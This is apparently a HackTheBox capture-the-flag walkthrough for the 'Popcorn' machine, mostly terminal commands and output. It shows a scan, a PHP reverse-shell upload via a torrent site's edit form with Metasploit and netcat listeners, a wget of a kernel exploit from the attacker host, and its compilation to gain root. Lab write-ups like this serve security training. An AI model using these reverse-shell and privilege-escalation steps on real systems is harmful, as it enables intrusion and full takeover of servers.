Popcorn (HACKTHEBOX)

root@kali:~/Downloads# nmap -A 10.10.10.6
Starting Nmap 7.70 ( https://nmap.org ) at 2018-12-20 19:07 EST
Nmap scan report for 10.10.10.6
Host is up (0.14s latency).
Not shown: 998 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 5.1p1 Debian 6ubuntu2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 1024 3e:c8:1b:15:21:15:50:ec:6e:63:bc:c5:6b:80:7b:38 (DSA)
|_ 2048 aa:1f:79:21:b8:42:f4:8a:38:bd:b8:05:ef:1a:07:4d (RSA)
80/tcp open http Apache httpd 2.2.12 ((Ubuntu))
|_http-server-header: Apache/2.2.12 (Ubuntu)
|_http-title: Site doesn’t have a title (text/html).
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=7.70%E=4%D=12/20%OT=22%CT=1%CU=37152%PV=Y%DS=2%DC=T%G=Y%TM=5C1C2E
OS:EB%P=x86_64-pc-linux-gnu)SEQ(SP=C8%GCD=1%ISR=CD%TI=Z%CI=Z%II=I%TS=8)OPS(
OS:O1=M54DST11NW6%O2=M54DST11NW6%O3=M54DNNT11NW6%O4=M54DST11NW6%O5=M54DST11
OS:NW6%O6=M54DST11)WIN(W1=16A0%W2=16A0%W3=16A0%W4=16A0%W5=16A0%W6=16A0)ECN(
OS:R=Y%DF=Y%T=40%W=16D0%O=M54DNNSNW6%CC=Y%Q=)T1(R=Y%DF=Y%T=40%S=O%A=S+%F=AS
OS:%RD=0%Q=)T2(R=N)T3(R=Y%DF=Y%T=40%W=16A0%S=O%A=S+%F=AS%O=M54DST11NW6%RD=0
OS:%Q=)T4(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T5(R=Y%DF=Y%T=40%W=0%S=Z
OS:%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T7(R=Y
OS:%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1(R=Y%DF=N%T=40%IPL=164%UN=0%RI
OS:PL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=Y%DFI=N%T=40%CD=S)

Network Distance: 2 hops
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE (using port 8080/tcp)
HOP RTT ADDRESS
1 137.74 ms 10.10.14.1
2 137.85 ms 10.10.10.6

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 25.73 seconds

now on browser

http://10.10.10.6

now on terminal

root@kali:~# dirb http://10.10.10.6/

now on browser

http://10.10.10.6/torrent/

through browser URL and what we see is a Webpage shown below. After looking at the page for some clue, we saw that we need to register on this site first.

After clicking on Register option on the Webpage. The registration form opened is shown below. As you can see you need give details to successfully register on this site.

username : raj
password : raj
password (confirm) : raj
email : abc@gmail.com
Enter code : a5ff6

click on register

After successfully registering on the website. Click on Upload option and the page opened is shown below. Now here we have given the path of any torrent file. Then Click on upload.

When the torrent file is successfully uploaded the next page we are redirected to is shown below. Now simply click on Edit this torrent option.

root@kali:~/Downloads# msfvenom -p php/meterpreter/reverse_tcp lhost=10.10.14.3 lport=4321 -f raw
[-] No platform was selected, choosing Msf::Module::Platform::PHP from the payload
[-] No arch selected, selecting arch: php from the payload
No encoder or badchars specified, outputting raw payload
Payload size: 1111 bytes
/* use exploit/multi/handler

msf exploit(multi/handler) set payload php/meterpreter/reverse_tcp

msf exploit(multi/handler) set lhost 10.10.14.3

msf exploit(multi/handler) set lport 4321

msf exploit(multi/handler) exploit

click on that php file

we get the meterpreter session

meterpreter > sysinfo

meterpreter > cd /home

meterpreter > ls

meterpreter > cd george

meterpreter > ls

meterpreter > cat user.txt
5e36a919398xxxxxxxxxxxxxxxxxxxxxxxxxx

now on browser

https://www.exploit-db.com/exploits/15704/

download this

root@kali:~/Downloads# searchsploit 15704.c
————————————— —————————————-
Exploit Title | Path
| (/usr/share/exploitdb/)
————————————— —————————————-
Linux Kernel 2.6.37 (RedHat / Ubuntu 1 | exploits/linux/local/15704.c
————————————— —————————————-
Shellcodes: No Result

root@kali:~/Downloads# locate 15704.c
/usr/share/exploitdb/exploits/linux/local/15704.c

root@kali:~/Downloads# cp /usr/share/exploitdb/exploits/linux/local/15704.c .

root@kali:~/Downloads# python -m SimpleHTTPServer 80
Serving HTTP on 0.0.0.0 port 80 …
10.10.10.6 – – [01/Jan/2019 19:14:27] “GET /15704.c HTTP/1.0” 200 –

back to shell

meterpreter > shell
Process 3625 created.
Channel 1 created.

python -c ‘import pty; pty.spawn(“/bin/bash”)’

www-data@popcorn:/tmp$ wget http://10.10.14.72/15704.c
wget http://10.10.14.3/15704.c
–2019-01-02 02:04:40– http://10.10.14.3/15704.c
Connecting to 10.10.14.3:80… connected.
HTTP request sent, awaiting response… 200 OK
Length: 9487 (9.3K) [text/plain]
Saving to: `15704.c.1′

100%[======================================>] 9,487 56.3K/s in 0.2s

2019-01-02 02:04:41 (56.3 KB/s) – `15704.c.1′ saved [9487/9487]

www-data@popcorn:/tmp$ ls -lrt

ls -lrt
total 276
-rw-rw-rw- 1 www-data www-data 25304 Oct 15 03:46 linuxprivchecker.py
-rw-rw-rw- 1 www-data www-data 47585 Oct 21 14:00 LinEnum.sh
-rw-rw-rw- 1 www-data www-data 9487 Oct 30 02:19 15704.c
-rw-rw-rw- 1 www-data www-data 14922 Jan 1 13:43 17787.c.1
-rw-rw-rw- 1 www-data www-data 14922 Jan 1 13:43 17787.c
-rw-rw-rw- 1 www-data www-data 127281 Jan 1 13:47 rds.c
-rwxrwxrwx 1 www-data www-data 13557 Jan 1 13:48 14704
-rw-r–r– 1 www-data www-data 9487 Jan 2 2019 15704.c.1

www-data@popcorn:/tmp$ gcc 15704.c -o exploit
gcc 15704.c -o exploit

www-data@popcorn:/tmp$ chmod 777 exploit
chmod 777 exploit

www-data@popcorn:/tmp$ ./exploit
./exploit
[*] Resolving kernel addresses…
[+] Resolved econet_ioctl to 0xf840a280
[+] Resolved econet_ops to 0xf840a360
[+] Resolved commit_creds to 0xc01645d0
[+] Resolved prepare_kernel_cred to 0xc01647d0
[*] Calculating target…
[*] Failed to set Econet address.
[*] Triggering payload…
[*] Got root!

# id
id
uid=0(root) gid=0(root)

# cd /root
cd /root

# cat root.txt
cat root.txt
f122331023a93xxxxxxxxxxxxxxxxxxxxxxxxxxxxx

without metasploit

upload php.png file in screenshot and once we tried it we get the shell (php-reverse-shell.php)

root@kali:~/Downloads# nc -lvnp 1234
listening on [any] 1234 …
connect to [10.10.14.3] from (UNKNOWN) [10.10.10.6] 53279
Linux popcorn 2.6.31-14-generic-pae #48-Ubuntu SMP Fri Oct 16 15:22:42 UTC 2009 i686 GNU/Linux
05:25:26 up 4 min, 0 users, load average: 0.00, 0.00, 0.00
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: can’t access tty; job control turned off
$ whoami
www-data
$ python -c ‘import pty; pty.spawn(“/bin/bash”)’
www-data@popcorn:/$ cd /tmp
cd /tmp
www-data@popcorn:/tmp$ wget http://10.10.14.3/15704.c
wget http://10.10.14.3/15704.c
–2019-01-02 05:26:49– http://10.10.14.3/15704.c
Connecting to 10.10.14.3:80… connected.
HTTP request sent, awaiting response… 200 OK
Length: 9487 (9.3K) [text/plain]
Saving to: `15704.c’

100%[======================================>] 9,487 –.-K/s in 0.1s

2019-01-02 05:26:49 (63.4 KB/s) – `15704.c’ saved [9487/9487]

www-data@popcorn:/tmp$ gcc 15704.c -o 15704
gcc 15704.c -o 15704
www-data@popcorn:/tmp$ chmod 777 15704
chmod 777 15704
www-data@popcorn:/tmp$ ./15704
./15704
[*] Resolving kernel addresses…
[+] Resolved econet_ioctl to 0xf8418280
[+] Resolved econet_ops to 0xf8418360
[+] Resolved commit_creds to 0xc01645d0
[+] Resolved prepare_kernel_cred to 0xc01647d0
[*] Calculating target…
[*] Triggering payload…
[*] Got root!
#

@SAKSHAM DIXIT